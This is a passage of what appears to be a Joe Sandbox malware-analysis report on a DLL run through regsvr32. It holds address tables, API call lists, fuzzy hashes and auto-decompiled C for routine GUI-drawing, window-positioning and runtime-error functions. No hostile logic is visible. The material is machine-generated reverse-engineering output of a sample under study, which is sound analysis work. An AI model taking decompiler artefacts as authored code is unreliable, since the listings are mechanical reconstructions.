                                                                                                            0x10039c98
                                                                                                            0x10039c9b
                                                                                                            0x10039ca1
                                                                                                            0x10039ca5
                                                                                                            0x10039ca7
                                                                                                            0x10039cad
                                                                                                            0x10039caf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039caf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039d10
                                                                                                            0x10039d13
                                                                                                            0x10039d17
                                                                                                            0x10039d19
                                                                                                            0x10039c2e
                                                                                                            0x10039c2e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039d20
                                                                                                            0x10039d24
                                                                                                            0x10039d27
                                                                                                            0x10039d2a
                                                                                                            0x10039d2c
                                                                                                            0x10039d2d
                                                                                                            0x10039d2e
                                                                                                            0x10039d2f
                                                                                                            0x10039d30
                                                                                                            0x10039d33
                                                                                                            0x10039d35
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039cba
                                                                                                            0x10039cba
                                                                                                            0x10039cbd
                                                                                                            0x10039cbf
                                                                                                            0x10039cc1
                                                                                                            0x10039cc3
                                                                                                            0x10039cc6
                                                                                                            0x10039ccb
                                                                                                            0x10039cd1
                                                                                                            0x10039cd2
                                                                                                            0x10039cd5
                                                                                                            0x10039cd7
                                                                                                            0x10039cda
                                                                                                            0x10039cda
                                                                                                            0x10039ce2
                                                                                                            0x10039cee
                                                                                                            0x10039cee
                                                                                                            0x10039cf3
                                                                                                            0x10039cf4
                                                                                                            0x10039cfa
                                                                                                            0x10039cfe
                                                                                                            0x10039d00
                                                                                                            0x10039d02
                                                                                                            0x10039d04
                                                                                                            0x10039cb5
                                                                                                            0x10039cb5
                                                                                                            0x00000000
                                                                                                            0x10039cb5
                                                                                                            0x10039d04
                                                                                                            0x10039d06
                                                                                                            0x10039d09
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c46
                                                                                                            0x10039c49
                                                                                                            0x10039c4d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c36
                                                                                                            0x10039c39
                                                                                                            0x10039c3c
                                                                                                            0x10039c3e
                                                                                                            0x10039c41
                                                                                                            0x10039c83
                                                                                                            0x10039c83
                                                                                                            0x10039c88
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c1f
                                                                                                            0x10039c19
                                                                                                            0x10039c0e
                                                                                                            0x10039d69
                                                                                                            0x10039d69
                                                                                                            0x10039d6d
                                                                                                            0x10039d70
                                                                                                            0x10039d79
                                                                                                            0x10039d79
                                                                                                            0x10039d82
                                                                                                            0x10039d85
                                                                                                            0x10039d85
                                                                                                            0x10039bc7
                                                                                                            0x10039d8b
                                                                                                            0x10039d8d
                                                                                                            0x10039d96
                                                                                                            0x10039d98
                                                                                                            0x10039d98
                                                                                                            0x10039da2
                                                                                                            0x10039daa
                                                                                                            0x10039dac
                                                                                                            0x10039dd2
                                                                                                            0x10039dd5
                                                                                                            0x10039dda
                                                                                                            0x10039de5
                                                                                                            0x10039de9
                                                                                                            0x10039deb
                                                                                                            0x10039ded
                                                                                                            0x10039ded
                                                                                                            0x10039df1
                                                                                                            0x10039df8
                                                                                                            0x10039df8
                                                                                                            0x10039dfe
                                                                                                            0x10039e01
                                                                                                            0x10039e02
                                                                                                            0x10039e02
                                                                                                            0x10039ded
                                                                                                            0x10039deb
                                                                                                            0x10039e07
                                                                                                            0x10039e0a
                                                                                                            0x10039e14
                                                                                                            0x10039e15
                                                                                                            0x10039ecc
                                                                                                            0x10039ecc
                                                                                                            0x10039ecf
                                                                                                            0x10039ed2
                                                                                                            0x10039ed8
                                                                                                            0x10039edc
                                                                                                            0x10039ee0
                                                                                                            0x10039ee5
                                                                                                            0x10039eeb
                                                                                                            0x10039eed
                                                                                                            0x10039eef
                                                                                                            0x10039ef5
                                                                                                            0x10039efb
                                                                                                            0x00000000
                                                                                                            0x10039efb
                                                                                                            0x10039eef
                                                                                                            0x00000000
                                                                                                            0x10039edc
                                                                                                            0x10039e1b
                                                                                                            0x10039e1f
                                                                                                            0x10039e2c
                                                                                                            0x10039e36
                                                                                                            0x10039e39
                                                                                                            0x10039e3f
                                                                                                            0x10039e3f
                                                                                                            0x10039e44
                                                                                                            0x10039e49
                                                                                                            0x10039e4a
                                                                                                            0x10039e4d
                                                                                                            0x10039e4f
                                                                                                            0x10039e52
                                                                                                            0x10039e64
                                                                                                            0x10039e64
                                                                                                            0x10039e54
                                                                                                            0x10039e54
                                                                                                            0x10039e57
                                                                                                            0x10039e59
                                                                                                            0x10039e5a
                                                                                                            0x10039e60
                                                                                                            0x10039e60
                                                                                                            0x10039e66
                                                                                                            0x10039e6a
                                                                                                            0x10039e6d
                                                                                                            0x10039e73
                                                                                                            0x10039e78
                                                                                                            0x10039e78
                                                                                                            0x10039e7b
                                                                                                            0x10039e83
                                                                                                            0x10039e83
                                                                                                            0x10039e85
                                                                                                            0x10039e88
                                                                                                            0x10039e8d
                                                                                                            0x10039e8d
                                                                                                            0x10039e90
                                                                                                            0x10039e98
                                                                                                            0x10039e98
                                                                                                            0x10039e9a
                                                                                                            0x10039e9d
                                                                                                            0x10039ea2
                                                                                                            0x10039ea2
                                                                                                            0x10039ea5
                                                                                                            0x10039ead
                                                                                                            0x10039ead
                                                                                                            0x10039eb2
                                                                                                            0x10039eb8
                                                                                                            0x10039ec4
                                                                                                            0x10039ec7
                                                                                                            0x00000000
                                                                                                            0x10039e2e
                                                                                                            0x10039e2e
                                                                                                            0x10039efc
                                                                                                            0x10039efc
                                                                                                            0x10039f01
                                                                                                            0x10039f04
                                                                                                            0x10039f0a
                                                                                                            0x10039f0c
                                                                                                            0x00000000
                                                                                                            0x10039f1d
                                                                                                            0x10039f24
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f7f
                                                                                                            0x10039f82
                                                                                                            0x10039f85
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f3c
                                                                                                            0x10039f3f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f46
                                                                                                            0x10039f49
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f29
                                                                                                            0x10039f2c

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10039B2B
                                                                                                            • lstrlenA.KERNEL32(?,?,?), ref: 10039B65
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10039DF8
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10039E1F
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 10039E83
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 10039E98
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 10039EAD
                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 10039EE5
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10039EF5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 344392101-0
                                                                                                            • Opcode ID: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                                                            • Instruction ID: b8867a34d175485d2cb2ae4ba9cdbf6ea03067932d09ff1053ffea89e27b22ec
                                                                                                            • Opcode Fuzzy Hash: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                                                            • Instruction Fuzzy Hash: DBE1697590021ADFDF12CFA8D881AAEBBF5FF45342F214429E951EB261D730AE51CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10033FCE(intOrPtr* __ecx, void* __eflags) {
                                                                                                            				void* __esi;
                                                                                                            				void* _t132;
                                                                                                            				void* _t145;
                                                                                                            				intOrPtr* _t226;
                                                                                                            				void* _t229;
                                                                                                            
                                                                                                            				E10011BF0(0x1003b231, _t229);
                                                                                                            				_t226 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x30)) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x34)) = 0x10040668;
                                                                                                            				 *(_t229 - 4) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x28)) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x2c)) = 0x10040668;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x20)) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x24)) = 0x10040668;
                                                                                                            				 *(_t229 - 4) = 2;
                                                                                                            				E1000B4EC(_t229 - 0x2c,  *(_t229 + 8));
                                                                                                            				CopyRect(_t229 - 0x44,  *(_t229 + 8));
                                                                                                            				InflateRect(_t229 - 0x44,  ~( *(_t229 + 0xc)),  ~( *(_t229 + 0x10)));
                                                                                                            				IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 8));
                                                                                                            				E1002935D(_t229 - 0x24, CreateRectRgnIndirect(_t229 - 0x44));
                                                                                                            				E1002935D(_t229 - 0x34, CreateRectRgn(0, 0, 0, 0));
                                                                                                            				E10010478(_t229 - 0x34, _t229 - 0x2c, _t229 - 0x24, 3);
                                                                                                            				_t235 =  *((intOrPtr*)(_t229 + 0x20));
                                                                                                            				if( *((intOrPtr*)(_t229 + 0x20)) == 0) {
                                                                                                            					 *((intOrPtr*)(_t229 + 0x20)) = E10033F2F(_t226, _t235);
                                                                                                            				}
                                                                                                            				if( *((intOrPtr*)(_t229 + 0x24)) == 0) {
                                                                                                            					 *((intOrPtr*)(_t229 + 0x24)) =  *((intOrPtr*)(_t229 + 0x20));
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t229 - 0x18)) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x1c)) = 0x10040668;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x10)) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x14)) = 0x10040668;
                                                                                                            				 *(_t229 - 4) = 4;
                                                                                                            				if( *(_t229 + 0x14) != 0) {
                                                                                                            					E1002935D(_t229 - 0x1c, CreateRectRgn(0, 0, 0, 0));
                                                                                                            					E1001045D(_t229 - 0x2c,  *(_t229 + 0x14));
                                                                                                            					CopyRect(_t229 - 0x44,  *(_t229 + 0x14));
                                                                                                            					InflateRect(_t229 - 0x44,  ~( *(_t229 + 0x18)),  ~( *(_t229 + 0x1c)));
                                                                                                            					IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 0x14));
                                                                                                            					E1001045D(_t229 - 0x24, _t229 - 0x44);
                                                                                                            					E10010478(_t229 - 0x1c, _t229 - 0x2c, _t229 - 0x24, 3);
                                                                                                            					if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4))) {
                                                                                                            						E1002935D(_t229 - 0x14, CreateRectRgn(0, 0, 0, 0));
                                                                                                            						E10010478(_t229 - 0x14, _t229 - 0x1c, _t229 - 0x34, 3);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4)) &&  *(_t229 + 0x14) != 0) {
                                                                                                            					E10028E1A(_t226, _t229 - 0x1c);
                                                                                                            					 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
                                                                                                            					 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x24)));
                                                                                                            					PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
                                                                                                            					E10029439(_t226,  *(_t229 + 0x14));
                                                                                                            				}
                                                                                                            				_t132 = _t229 - 0x14;
                                                                                                            				if( *((intOrPtr*)(_t229 - 0x10)) == 0) {
                                                                                                            					_t132 = _t229 - 0x34;
                                                                                                            				}
                                                                                                            				E10028E1A(_t226, _t132);
                                                                                                            				 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
                                                                                                            				 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x20)));
                                                                                                            				PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
                                                                                                            				if( *(_t229 + 0x14) != 0) {
                                                                                                            					E10029439(_t226,  *(_t229 + 0x14));
                                                                                                            				}
                                                                                                            				E10028E1A(_t226, 0);
                                                                                                            				 *(_t229 - 4) = 3;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x14)) = 0x1003eb6c;
                                                                                                            				E100293B4(_t229 - 0x14);
                                                                                                            				 *(_t229 - 4) = 2;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x1c)) = 0x1003eb6c;
                                                                                                            				E100293B4(_t229 - 0x1c);
                                                                                                            				 *(_t229 - 4) = 1;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x24)) = 0x1003eb6c;
                                                                                                            				E100293B4(_t229 - 0x24);
                                                                                                            				 *(_t229 - 4) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x2c)) = 0x1003eb6c;
                                                                                                            				E100293B4(_t229 - 0x2c);
                                                                                                            				 *(_t229 - 4) =  *(_t229 - 4) | 0xffffffff;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x34)) = 0x1003eb6c;
                                                                                                            				_t145 = E100293B4(_t229 - 0x34);
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
                                                                                                            				return _t145;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10033FD3
                                                                                                              • Part of subcall function 1000B4EC: CreateRectRgnIndirect.GDI32(00000000), ref: 1000B4F3
                                                                                                            • CopyRect.USER32 ref: 10034012
                                                                                                            • InflateRect.USER32(?,?,?), ref: 10034028
                                                                                                            • IntersectRect.USER32 ref: 10034036
                                                                                                            • CreateRectRgnIndirect.GDI32(?), ref: 10034040
                                                                                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034053
                                                                                                              • Part of subcall function 10010478: CombineRgn.GDI32(?,?,?,00000003), ref: 1001049B
                                                                                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100340AF
                                                                                                            • CopyRect.USER32 ref: 100340CC
                                                                                                            • InflateRect.USER32(?,?,?), ref: 100340E2
                                                                                                            • IntersectRect.USER32 ref: 100340F0
                                                                                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034126
                                                                                                              • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                                                              • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                                                              • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                                                            • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 1003419B
                                                                                                              • Part of subcall function 10029439: SelectObject.GDI32(?,00000000), ref: 1002945B
                                                                                                              • Part of subcall function 10029439: SelectObject.GDI32(?,00000004), ref: 10029471
                                                                                                            • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100341EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prologPattern
                                                                                                            • String ID:
                                                                                                            • API String ID: 897514543-0
                                                                                                            • Opcode ID: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                                                            • Instruction ID: e5f9903ccf7cdd00105ec8572482158fef9e459befd851420e55a1fcda6e3601
                                                                                                            • Opcode Fuzzy Hash: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                                                            • Instruction Fuzzy Hash: 4191EFB690010DEFCF06DFA4D995CEEBBB9EF08244F51411AF906A7251DB34AE06CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 90%
                                                                                                            			E100219DD(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                            				signed int _v5;
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				struct tagRECT _v28;
                                                                                                            				struct tagRECT _v44;
                                                                                                            				struct tagRECT _v60;
                                                                                                            				struct tagRECT _v80;
                                                                                                            				char _v100;
                                                                                                            				intOrPtr _t55;
                                                                                                            				struct HWND__* _t56;
                                                                                                            				intOrPtr _t78;
                                                                                                            				intOrPtr _t90;
                                                                                                            				signed int _t99;
                                                                                                            				struct HWND__* _t100;
                                                                                                            				struct HWND__* _t102;
                                                                                                            				void* _t104;
                                                                                                            				long _t110;
                                                                                                            				void* _t113;
                                                                                                            				struct HWND__* _t115;
                                                                                                            				void* _t117;
                                                                                                            				intOrPtr _t119;
                                                                                                            				intOrPtr _t123;
                                                                                                            
                                                                                                            				_t113 = __edx;
                                                                                                            				_t119 = __ecx;
                                                                                                            				_v12 = __ecx;
                                                                                                            				_v8 = E100202AB(__ecx);
                                                                                                            				_t55 = _a4;
                                                                                                            				if(_t55 == 0) {
                                                                                                            					if((_v5 & 0x00000040) == 0) {
                                                                                                            						_t56 = GetWindow( *(__ecx + 0x1c), 4);
                                                                                                            					} else {
                                                                                                            						_t56 = GetParent( *(__ecx + 0x1c));
                                                                                                            					}
                                                                                                            					_t115 = _t56;
                                                                                                            					if(_t115 != 0) {
                                                                                                            						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
                                                                                                            						if(_t100 != 0) {
                                                                                                            							_t115 = _t100;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t115 =  *(_t55 + 0x1c);
                                                                                                            				}
                                                                                                            				GetWindowRect( *(_t119 + 0x1c),  &_v44);
                                                                                                            				if((_v5 & 0x00000040) != 0) {
                                                                                                            					_t102 = GetParent( *(_t119 + 0x1c));
                                                                                                            					GetClientRect(_t102,  &_v28);
                                                                                                            					GetClientRect(_t115,  &_v60);
                                                                                                            					MapWindowPoints(_t115, _t102,  &_v60, 2);
                                                                                                            				} else {
                                                                                                            					if(_t115 != 0) {
                                                                                                            						_t99 = GetWindowLongA(_t115, 0xfffffff0);
                                                                                                            						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
                                                                                                            							_t115 = 0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_v100 = 0x28;
                                                                                                            					if(_t115 != 0) {
                                                                                                            						GetWindowRect(_t115,  &_v60);
                                                                                                            						E10007B50(E10007AE5(_t115, 2),  &_v100);
                                                                                                            						CopyRect( &_v28,  &_v80);
                                                                                                            					} else {
                                                                                                            						_t90 = E10006C53();
                                                                                                            						if(_t90 != 0) {
                                                                                                            							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
                                                                                                            						}
                                                                                                            						E10007B50(E10007AE5(_t90, 1),  &_v100);
                                                                                                            						CopyRect( &_v60,  &_v80);
                                                                                                            						CopyRect( &_v28,  &_v80);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t117 = _v44.right - _v44.left;
                                                                                                            				asm("cdq");
                                                                                                            				_t104 = _v44.bottom - _v44.top;
                                                                                                            				asm("cdq");
                                                                                                            				_t114 = _v60.bottom;
                                                                                                            				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
                                                                                                            				asm("cdq");
                                                                                                            				asm("cdq");
                                                                                                            				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
                                                                                                            				if(_t110 >= _v28.left) {
                                                                                                            					_t78 = _v28.right;
                                                                                                            					if(_t117 + _t110 > _t78) {
                                                                                                            						_t110 = _t78 - _v44.right + _v44.left;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t110 = _v28.left;
                                                                                                            				}
                                                                                                            				if(_t123 >= _v28.top) {
                                                                                                            					if(_t104 + _t123 > _v28.bottom) {
                                                                                                            						_t123 = _v44.top - _v44.bottom + _v28.bottom;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t123 = _v28.top;
                                                                                                            				}
                                                                                                            				return E100204FE(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
                                                                                                            			}


























                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 808654186-0
                                                                                                            • Opcode ID: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                                                            • Instruction ID: c5023cb8dd4c56e62e69e6e4efe16b58097a74c7fe0422dfe49a5ff72fe10001
                                                                                                            • Opcode Fuzzy Hash: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                                                            • Instruction Fuzzy Hash: 9A51AD76A00219AFDB01DBA8DC89FEEBBBDEF48350F154115E901F7281EB30B9458B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 50%
                                                                                                            			E10016BAA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr _t32;
                                                                                                            				intOrPtr* _t33;
                                                                                                            				void* _t41;
                                                                                                            				signed int _t54;
                                                                                                            				unsigned int _t59;
                                                                                                            				void* _t75;
                                                                                                            				intOrPtr* _t76;
                                                                                                            				signed int _t81;
                                                                                                            				char* _t83;
                                                                                                            				void* _t86;
                                                                                                            				intOrPtr _t87;
                                                                                                            				void* _t88;
                                                                                                            				intOrPtr _t89;
                                                                                                            
                                                                                                            				_push(0x118);
                                                                                                            				_push(0x10042558);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t32 =  *0x1004c470; // 0xf3933a06
                                                                                                            				 *((intOrPtr*)(_t88 - 0x1c)) = _t32;
                                                                                                            				_t33 =  *0x1004f708; // 0x0
                                                                                                            				if(_t33 == 0) {
                                                                                                            					if( *((intOrPtr*)(_t88 + 8)) == 1) {
                                                                                                            						_t83 = "Buffer overrun detected!";
                                                                                                            						 *(_t88 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
                                                                                                            						_t86 = 0xb9;
                                                                                                            					} else {
                                                                                                            						_t83 = "Unknown security failure detected!";
                                                                                                            						 *(_t88 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
                                                                                                            						_t86 = 0xd4;
                                                                                                            					}
                                                                                                            					 *((char*)(_t88 - 0x20)) = 0;
                                                                                                            					if(GetModuleFileNameA(0, _t88 - 0x124, 0x104) == 0) {
                                                                                                            						E10017B90(_t88 - 0x124, "<program name unknown>");
                                                                                                            					}
                                                                                                            					_t71 = _t88 - 0x124;
                                                                                                            					if(E10011820(_t88 - 0x124) + 0xb > 0x3c) {
                                                                                                            						E10019E20(E10011820(_t71) + _t88 - 0xf3, "...", 3);
                                                                                                            						_t89 = _t89 + 0x10;
                                                                                                            					}
                                                                                                            					_t41 = E10011820(_t71);
                                                                                                            					_pop(_t75);
                                                                                                            					E10010B20(_t41 + _t86 + 0x0000000c + 0x00000003 & 0xfffffffc, _t75);
                                                                                                            					 *((intOrPtr*)(_t88 - 0x18)) = _t89;
                                                                                                            					_t87 = _t89;
                                                                                                            					E10017B90(_t87, _t83);
                                                                                                            					E10017BA0(_t87, "\n\n");
                                                                                                            					E10017BA0(_t87, "Program: ");
                                                                                                            					E10017BA0(_t87, _t71);
                                                                                                            					E10017BA0(_t87, "\n\n");
                                                                                                            					E10017BA0(_t87,  *(_t88 - 0x128));
                                                                                                            					_push(0x12010);
                                                                                                            					_push("Microsoft Visual C++ Runtime Library");
                                                                                                            					_push(_t87);
                                                                                                            					E10019D1D();
                                                                                                            					_t89 = _t89 + 0x3c;
                                                                                                            				} else {
                                                                                                            					 *(_t88 - 4) = 0;
                                                                                                            					 *_t33( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 + 0xc)));
                                                                                                            					 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
                                                                                                            				}
                                                                                                            				E10011F56(3);
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				asm("int3");
                                                                                                            				_t81 =  *(_t89 + 4);
                                                                                                            				_t76 =  *((intOrPtr*)(_t89 + 8));
                                                                                                            				if((_t81 & 0x00000003) != 0) {
                                                                                                            					if((_t81 & 0x00000001) == 0) {
                                                                                                            						L27:
                                                                                                            						_t54 =  *_t81;
                                                                                                            						_t81 = _t81 + 2;
                                                                                                            						if(_t54 !=  *_t76) {
                                                                                                            							goto L22;
                                                                                                            						} else {
                                                                                                            							_t54 = _t54;
                                                                                                            							if(_t54 == 0) {
                                                                                                            								goto L21;
                                                                                                            							} else {
                                                                                                            								if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
                                                                                                            									goto L22;
                                                                                                            								} else {
                                                                                                            									if(_t54 == 0) {
                                                                                                            										goto L21;
                                                                                                            									} else {
                                                                                                            										_t76 = _t76 + 2;
                                                                                                            										goto L12;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t54 =  *_t81;
                                                                                                            						_t81 = _t81 + 1;
                                                                                                            						if(_t54 !=  *_t76) {
                                                                                                            							goto L22;
                                                                                                            						} else {
                                                                                                            							_t76 = _t76 + 1;
                                                                                                            							if(_t54 == 0) {
                                                                                                            								goto L21;
                                                                                                            							} else {
                                                                                                            								if((_t81 & 0x00000002) == 0) {
                                                                                                            									goto L12;
                                                                                                            								} else {
                                                                                                            									goto L27;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					while(1) {
                                                                                                            						L12:
                                                                                                            						_t54 =  *_t81;
                                                                                                            						if(_t54 !=  *_t76) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_t54 = _t54;
                                                                                                            						if(_t54 == 0) {
                                                                                                            							L21:
                                                                                                            							return 0;
                                                                                                            						} else {
                                                                                                            							if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
                                                                                                            								break;
                                                                                                            							} else {
                                                                                                            								_t59 = _t54;
                                                                                                            								if(_t59 == 0) {
                                                                                                            									goto L21;
                                                                                                            								} else {
                                                                                                            									_t54 = _t59 >> 0x10;
                                                                                                            									if(_t54 !=  *((intOrPtr*)(_t76 + 2))) {
